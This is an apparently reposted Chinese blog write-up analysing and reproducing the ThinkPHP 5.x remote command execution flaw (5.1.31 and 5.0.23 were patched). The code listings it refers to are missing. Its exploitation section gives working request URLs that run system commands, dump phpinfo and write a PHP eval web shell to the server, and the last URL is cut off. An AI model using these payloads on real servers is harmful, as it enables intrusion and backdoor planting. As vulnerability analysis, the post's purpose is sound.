ThinkPHP 5.x 遠程命令執行漏洞分析與復現

2019-10-14     科技i關注

0x00 前言

ThinkPHP 官方 2018 年 12 月 9 日發布重要的安全更新,修復了一個嚴重的遠程代碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒有進行足夠的檢測會導致在沒有開啟強制路由的情況下可能的 getshell 漏洞,受影響的版本包括 5.0 和 5.1 版本,推薦儘快更新到最新版本。

0x01 影響範圍

5.x < 5.1.31, <= 5.0.23

0x02 漏洞分析

Thinkphp v5.0.x 補丁地址: https://github.com/top-think/framework/com...

Thinkphp v5.1.x 補丁地址: https://github.com/top-think/framework/com...

路由信息中 controller 的部分進行了過濾,可知問題出現在路由調度時

關鍵代碼:

在修復之前程序未對控制器進行過濾,導致攻擊者可以通過引入 \\ 符號來調用任意類方法。

其中使用了 $this->app->controller 方法來實例化控制器,然後調用實例中的方法。跟進 controller 方法:

其中通過 parseModuleAndClass 方法解析出 $module 和 $class,然後實例化 $class。

而 parseModuleAndClass 方法中,當 $name 以反斜線 \\ 開始時直接將其作為類名。利用命名空間的特點,如果可以控制此處的 $name(即路由中的 controller 部分),那麼就可以實例化任何一個類。

接著,我們再往回看路由解析的代碼。其中 route/dispatch/Url.php:: parseUrl 方法調用了 route/Rule.php:: parseUrlPath 來解析 pathinfo 中的路由信息

代碼比較簡單,就是使用 / 對 $url 進行分割,未進行任何過濾。

其中的路由 url 從 Request::path () 中獲取

由於 var_pathinfo 的默認配置為 s,我們可利用 $_GET ['s'] 來傳遞路由信息,也可利用 pathinfo 來傳遞,但測試時 windows 環境下會將 $_SERVER ['pathinfo'] 中的 \\ 替換為 /。結合前面分析可得初步利用代碼如下:index.php?s=index/\\namespace\\class/method ,這將會實例化 \\namespace\\class 類並執行 method 方法。

0x03 漏洞利用

docker 漏洞環境源碼:https://github.com/vulnspy/thinkphp-5.1.29

本地環境:thinkphp5.0.15+php5.6n+ apache2.0

http://www.thinkphp.cn/donate/download/id/...

1. 利用 system 函數遠程命令執行

http://localhost:9096/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2. 通過 phpinfo 函數寫出 phpinfo () 的信息

http://localhost:9096/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

3. 寫入 shell:

http://localhost:9096/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

或者

http://localhost:9096/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=

以上就是ThinkPHP 5.x 遠程命令執行漏洞分析與復現的詳細內容,更多請關注其它相關文章!

更多技巧請《轉發 + 關注》哦!

文章來源: https://twgreatdaily.com/zh-tw/LY3-zG0BMH2_cNUgSZlN.html